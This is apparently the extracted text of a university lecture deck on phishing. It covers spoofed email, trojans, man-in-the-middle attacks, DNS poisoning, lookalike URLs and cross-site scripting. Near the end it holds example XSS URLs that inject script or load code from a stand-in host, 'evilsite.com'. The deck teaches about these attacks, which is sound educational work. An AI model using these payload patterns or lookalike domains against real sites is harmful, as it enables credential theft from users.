L1 phishing

PhishingPhishing
1Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh

About me
 Currently, Lecturer in this department for
351 days 
 Former Research Intern in M3C Laboratory,
University of Bolton, UK
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 2

For you
 Email me at rushdecoder@yahoo.com if
you want
 My homepage and course materials are at
http://rushdishams.googlepages.com
 You need to join
http://groups.google.com/group/csebatche
sofrushdi

Phishing
 The number of unique e-mail-based fraud
attacks detected in November 2005 was
16,882, almost double the 8,975 attacks
launched in November 2004, said the report
(Anti-Phishing Working Group)
 Phishing e-mails pretend to come from
legitimate companies, such as banks and e-
commerce sites
 Used by criminals to try and trick Web users
into revealing personal information and
account detailsRushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 4

Phishing
 The number of brands targeted increased
by nearly 50 percent over the course of
2005, from 64 percent to 93 percent in
November 2006
 "One big attack will temporarily hurt a
brand, but the increase in e-commerce is
not slowing down,"
(Mark Murtagh, Websense technical director)

Phishing
 Top brands continue to be hijacked, with
phishers using established names to try to lure
people to their sites
 eBay is often spoofed, for obvious reasons
 Google is increasingly being targeted because
of its expansion into different business
application models.
 The big banking names are used too--HSBC,
Citigroup, Lloyds--all the major brands

Phishing
 There's no point in using local names if the
attack is global
 Attacks are becoming increasingly
sophisticated
 Web sites are hosting keylogging malicious
software
 Before, people had to click on a site to
download malicious code.
 If they thought a web site 'phishy,' they could
leave and probably not be harmed.
 Now. with most phishing sites they just have to

Phishing
 Twenty-five percent of those sites now host
keylogging code
 If you visit one you will probably open yourself
to identity theft or fraud

Exploiting the Weakness
 Why is it that Crooks are able to mount an
attack?
 What are the weaknesses that they exploit?
 Richness of functionality
Complex systems can have program bugs
 Increasing interconnectivity
Separate functions of any system are combined
and interconnected via Internet

Exploiting the Weakness
 Expanding market in exploits
Very few people requires as the technical
gadgets are impressive and cheap
 The scale of content based attacks
Everyone uses e-mails and e-mails are
exploitable. Then why not?

Social Engineering Factors
 Phishing attacks rely upon a mix of technical
deceit and social engineering practices.
 In the majority of cases the Phisher must
persuade the victim
 The victim intentionally performs a series of
actions that will provide access to
confidential information

 Communication channels such as email,
web-pages, IRC and instant messaging
services are popular.
 Phisher must impersonate a trusted source
(e.g. the helpdesk of their bank, automated
support response from their favourite
online retailer, etc.) for the victim to
believe.

Phishing Techniques
 Phishing attacks initiated by email are the
most common.
 Using Trojan Network, Phishers can deliver
specially crafted emails to millions of
legitimate “live” email addresses within a
few hours
 Sometimes phishers purchase e-mail
address

Phishing Techniques
 Utilising well known flaws in the common
mail server communication protocol
(SMTP), Phishers are able to create emails
with fake “Mail From:” headers and
impersonate any organisation they choose.
 Any customer replies to the phishing email
will be sent to them.

Phishing Techniques
 Official looking and sounding emails
 Copies of legitimate corporate emails with
minor URL changes
 HTML based email used to obfuscate target
URL information
 Standard virus/worm attachments to emails

Phishing Techniques
 A plethora of anti spam-detection inclusions
 Crafting of “personalised” or unique email
messages
 Fake postings to popular message boards
and mailing lists
 Use of fake “Mail From:” addresses and
open mail relays for disguising the source of
the email

A real-life phishing example

Things to note
 The email was sent in HTML format
 Lower-case L’s have been replaced with
upper-case I’s. This is used to help bypass
many standard anti-spam filters

Things to note
 Within the HTML-based email, the URL link
https://oIb.westpac.com.au/ib/defauIt.asp in fact
points to a escape-encoded version of the following
URL:
http://olb.westpac.com.au.userdll.com:4903/ib/index.
htm

Things to note

Things to note
 The non-standard HTTP port of 4903 can be
attributed to the fact that the Phishers fake
site was hosted on a third-party PC that had
been previously compromised by an
attacker Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 22

Things to note
 Recipients that clicked on the link were
then forwarded to the real Westpac
application.
 However a JavaScript popup window
containing a fake login page was presentedRushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 23

Things to note
 This fake login window was designed to capture and
store the recipient’s authentication credentials
 JavaScript also submitted the authentication
information to the real Westpac application

Where are they standing now?
 The inclusion of HTML disguised links
 The use of third-party supplied, or fake,
banner advertising graphics to lure
customers
 The use of web-bugs (hidden items within
the page – such as a zero-sized graphic) to
track a potential customer
 The use of pop-up or frameless windows to
disguise the true source of the Phishers
message.

Where are they standing now?
 Embedding malicious content within the
viewable web-page
 installs software of the Phishers choice (e.g.
key-loggers, screen-grabbers, back-doors
and other Trojan horse programs).

Banner Advertising

IRC and IM
 New on the Phishers radar, IRC and Instant
Messaging (IM) forums are likely to become
a popular phishing ground.
 The common usage of Bots (automated
programs that listen and participate in
group discussions) in many of the popular
channels,

Trojan Hosts
 the delivery source is increasingly becoming
home PC’s that have been previously
compromised.
 Trojan horse program has been installed
which allows Phishers (along with
Spammers, Warez Pirates, DDoS Bots, etc.)
to use the PC as a message propagator.
 tracking back a Phishing attack to an
individual initiating criminal is extremely
difficult.

Trojan Hosts
 the installation of Trojan horse software is
on the increase, despite the efforts of large
anti-virus companies.
 operate large networks of Trojan
deployments (networks consisting of
thousands of hosts are not uncommon)
 Phishers must be selective about the
information they wish to record or be faced
with information overload.

Information Specific Trojans
 You have come across a file named
JavaUtil.zip.
 But you forgot that you have “do not show
known file extensions” in your Windows
setting.
 Hmm, then JavaUtil.zip originally maybe a
.exe file whose full name is JavaUtil.zip.exe
 You, unfortunately, click that zip file to
unzip it.
 You are doomed! 

Information Specific Trojans
 Early in 2004, a Phisher created a custom key-logger
Trojan.
 The Trojan key-logger was designed specifically to
capture all key presses within windows with the titles
of various names including:- commbank,
Commonwealth, NetBank, Citibank, Bank of America,
e-gold, e-bullion, e-Bullion, evocash, EVOCash,
EVOcash, intgold, INTGold, paypal, PayPal, bankwest,
Bank West, BankWest, National Internet Banking, cibc,
CIBC, scotiabank and ScotiaBank

Phishing Attack Vectors
 Man-in-the-middle Attacks
 URL Obfuscation Attacks
 Cross-site Scripting Attacks
 Preset Session Attacks

Man in the Middle Attacks
 the attacker situates themselves between
the customer and the real web-based
application, and proxies all communications
between the systems.
 This form of attack is successful for both
HTTP and HTTPS communications.
 The customer connects to the attackers
server as if it was the real site
 The attackers server makes a simultaneous
connection to the real site.

 The attackers server then proxies all
communications between the customer and
the real web-based application server
 In the case of secure HTTPS
communications, an SSL connection is
established between the customer and the
attackers proxy
 while the attackers proxy creates its own
SSL connection between itself and the real
server.

 The attacker must be able to direct the
customer to their proxy server instead of
the real server.
 This may be carried out through a number
of methods:
 Transparent Proxies
 DNS Cache Poisoning
 URL Obfuscation

Transparent Proxies
 Situated on the same network segment or
located on route to the real server
 a transparent proxy service can intercept all
data by forcing all outbound HTTP and
HTTPS traffic through itself.

DNS Cache Poisoning
 be used to disrupt normal traffic routing by
injecting false IP addresses for key domain
names.
 the attacker poisons the DNS cache of a
network firewall so that all traffic destined
for the MyBank IP address now resolves to
the attackers proxy server IP address

URL Obfuscation
 the attacker tricks the customer into connecting to
their proxy server instead of the real server.
 the customer may follow a link to
http://privatebanking.mybank.com.ch
http://mybank.privatebanking.com
http://privatebanking.mybonk.com
http://privatebanking.mybánk.com
http://privatebanking.mybank.hackproof.com
 And the real one is
http://privatebanking.mybank.com

Third party shortened URL

Cross Site Scripting (XSS)
 make use of custom URL or code injection
into a valid web-based application URL
 the result of poor web-application
development processes.

 Full HTML substitution such as:
http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm
 Inline embedding of scripting content, such
as:
http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode
 Forcing the page to load external scripting
code, such as:
http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2

Preset Session Attack

Hidden Frame

Graphical Substitution

References
 The Phishing Guide by Next Generation
Security Software Software Limited.

Related Papers
 Technical Trends in Phishing Attacks by
Jason Milletary
 Why Phishing Works by Dhamija et al.

L1 phishing

Empfohlen

Empfohlen

Weitere ähnliche Inhalte

Was ist angesagt?

Was ist angesagt? (12)

Andere mochten auch

Andere mochten auch (20)

Ähnlich wie L1 phishing

Ähnlich wie L1 phishing (20)

Mehr von Rushdi Shams

Mehr von Rushdi Shams (20)

Kürzlich hochgeladen

Kürzlich hochgeladen (20)

L1 phishing